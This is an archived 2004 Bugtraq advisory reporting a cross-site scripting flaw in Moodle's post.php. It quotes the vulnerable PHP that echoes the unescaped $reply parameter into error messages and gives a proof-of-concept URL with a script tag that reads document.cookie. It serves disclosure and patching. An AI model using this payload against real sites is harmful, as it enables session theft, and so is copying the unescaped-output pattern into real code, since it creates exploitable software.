lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040806212329.3966.qmail@www.securityfocus.com>
Date: 6 Aug 2004 21:23:29 -0000
From: Javier Ubilla Brenni <javierubilla@...mac.com>
To: bugtraq@...urityfocus.com
Subject: xss in moodle (post.php)





+--------------------------------+
|                                | 
| XSS in Moodle < 1.3 (post.php) |
|                                |
+--------------------------------+

Autor: Javier Ubilla Brenni <javierubilla[at]spymac.com>
Date: 02/08/04

Software Description:
~~~~~~~~~~~~~~~~~~~~

"Moodle is a course management system (CMS) - a software package designed to help educators create quality online courses."
www.moodle.org

Bug:
~~~

Post.php is vulnerable to an XXS attack.
The bug was found in the $reply variable :

/* Begin of vulnerable code */

    } else if (isset($reply)) {      // User is writing a new reply

        if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");
        }
        if (! $discussion = get_record("forum_discussions", "id", $parent->discussion)) {
            error("This post is not part of a discussion! ($reply)");
        }
        if (! $forum = get_record("forum", "id", $discussion->forum)) {
            error("The forum number was incorrect ($discussion->forum)");
        }
        if (! $course = get_record("course", "id", $discussion->course)) {
            error("The course number was incorrect ($discussion->course)");
        }

        if (! forum_user_can_post($forum)) {
            error("Sorry, but you can not post in this forum.");
        }

        if ($cm = get_coursemodule_from_instance("forum", $forum->id, $course->id)) {
            if (groupmode($course, $cm) and !isteacheredit($course->id)) {   // Make sure user can post here
                if (mygroupid($course->id) != $discussion->groupid) {
                    error("Sorry, but you can not post in this discussion.");
                }
            }
            if (!$cm->visible and !isteacher($course->id)) {
                error(get_string("activityiscurrentlyhidden"));
            }
        }

/* End of vulnerable code */

Here is the bug:

if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");

Exploit:
~~~~~~~~

http://www.vulnerable.com/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Solution: 
~~~~~~~~~
Upgrade to the last version

Vendor Status:
~~~~~~~~~~~~~~
Notified.

Credits: Bug found by Javier Ubilla and Ariel.
~~~~~~~


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ